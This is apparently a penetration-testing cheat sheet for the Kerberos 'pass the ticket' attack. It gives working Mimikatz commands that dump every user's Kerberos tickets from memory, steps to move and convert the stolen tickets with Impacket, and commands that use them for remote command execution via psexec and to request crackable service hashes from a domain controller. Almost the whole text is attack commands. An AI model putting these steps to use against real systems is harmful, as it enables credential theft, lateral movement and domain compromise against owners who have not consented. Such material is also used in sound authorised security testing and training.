Pass the ticket

Mimikatz

1.Dump all tickets from memory from the compromised system.

Condition: To export the tickets, we need administrative privilege on the target system, at least as Local Administrator.

SEKURLSA::tickets - Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users). - ADSecurity.org

mimiktaz# privilege::debug
mimiktaz# SEKURLSA::tickets /export

Exporting all the tickets for all recently authenticated users

The tickets dumped in .kirbi format

2. Transfer the .kirbi ticket over our attacker machine.

3. Convert the ticket format

Use the script impacket-ticketConverter to convert the .kirbi ticket into .ccache ticket. This aim to convert the ticket between Linux and Windows format.

root@kali# impacket-ticketConverter krbtgt-XOR.COM.kirbi krbtgt-XOR.COM.ccache

Converting the ticket from .kirbi to .ccache

4. Export the ticket for Impacket use

root@kali# export KRB5CCNAME=krgtgt-XOR.COM.ccache

5. Execute commands

Now that our ticket has been exported, we can use the ticket to execute remote commands on the target system.

-k: Tells Impacket to use the Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters

-no-pass: To avoid prompting for a password

Example of executing remote command via psexec

root@kali# impacket-psexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Example of requesting Kerberos hashes

impacket-GetUserSPNs -request -dc-ip 10.11.1.120  -k -no-pass 'XOR.COM/XOR-APP59$'